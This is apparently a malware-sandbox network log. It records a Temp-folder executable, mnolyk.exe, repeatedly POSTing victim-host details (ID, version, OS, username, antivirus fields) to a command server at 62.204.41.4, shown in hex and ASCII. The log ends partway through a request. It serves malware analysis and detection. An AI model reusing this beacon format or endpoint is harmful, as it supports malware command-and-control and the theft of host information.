                                                                      Feb 7, 2023 23:09:06.509118080 CET  581                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      467         192.168.2.7  50162        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:06.685785055 CET  582                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:06.750828028 CET  582                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      468         192.168.2.7  50163        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:06.937702894 CET  583                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:07.000040054 CET  583                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      469         192.168.2.7  50164        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:07.186121941 CET  584                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:07.250969887 CET  584                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      47          192.168.2.7  49741        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:07:12.972312927 CET  151                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:13.038661957 CET  151                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      470         192.168.2.7  50165        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:07.791157007 CET  585                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:07.854868889 CET  585                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      471 | 192.168.2.7 | 50166 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:08.121536016 CET | 586 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:08.184685946 CET | 586 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      472 | 192.168.2.7 | 50167 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:08.918958902 CET | 587 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:08.983628035 CET | 587 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      473 | 192.168.2.7 | 50168 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:09.197665930 CET | 588 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:09.261853933 CET | 588 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      474 | 192.168.2.7 | 50169 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:10.009649038 CET | 589 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:10.078298092 CET | 589 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      475 | 192.168.2.7 | 50170 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:10.682104111 CET | 590 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:10.745945930 CET | 590 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      476 | 192.168.2.7 | 50171 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:10.958889961 CET | 591 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:11.023277998 CET | 591 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      477 | 192.168.2.7 | 50172 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:11.243218899 CET | 592 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:11.306339979 CET | 592 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      478 | 192.168.2.7 | 50173 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:11.479350090 CET | 593 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:11.544918060 CET | 593 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      479 | 192.168.2.7 | 50174 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:11.713079929 CET | 594 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:11.777556896 CET | 594 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      48 | 192.168.2.7 | 49742 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:13.217593908 CET | 152 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:13.279896975 CET | 152 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      480 | 192.168.2.7 | 50175 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:11.950103045 CET | 595 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:12.012918949 CET | 595 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      481 | 192.168.2.7 | 50176 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:12.185199976 CET | 596 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:12.250057936 CET | 596 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      482 | 192.168.2.7 | 50177 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:12.432080030 CET | 597 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:12.495201111 CET | 597 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      483 | 192.168.2.7 | 50178 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:12.666182041 CET | 598 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
